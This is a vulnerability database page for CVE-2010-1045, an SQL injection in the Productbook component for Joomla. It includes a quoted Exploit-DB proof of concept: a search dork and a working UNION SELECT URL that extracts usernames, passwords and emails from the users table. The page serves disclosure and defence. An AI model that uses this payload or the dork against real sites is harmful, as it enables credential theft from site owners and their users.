CVE-2010-1045
Description
SQL injection vulnerability in the Productbook (com_productbook) component 1.0.4 for Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter in a detail action to index.php. NOTE: some of these details are obtained from third party information.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Joomla! Component com_productbook - SQL Injection
Joomla Component "com_productbook" SQL Injection Vulnerability
========================================================
####################################################################
.:. Author : Snakespc
.:. Home : sec-war.com/cc
.:. Script : Joomla
.:. Bug Type : SQL Injection
.:. Dork : inurl:"com_productbook"
####################################################################
===[ Exploit ]===
http://server/index.php?option=com_productbook&Itemid=97&func=detail&id=-73+UNION all SELECT 1,2,3,concat(username,0x3a,password,0x3a,email),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58+from+condev.jos_users--
####################################################################
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| design-cars | com_productbook | 1.0.4 | |
| joomla | joomla\! | | |
References
CWEs
CWE-89
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.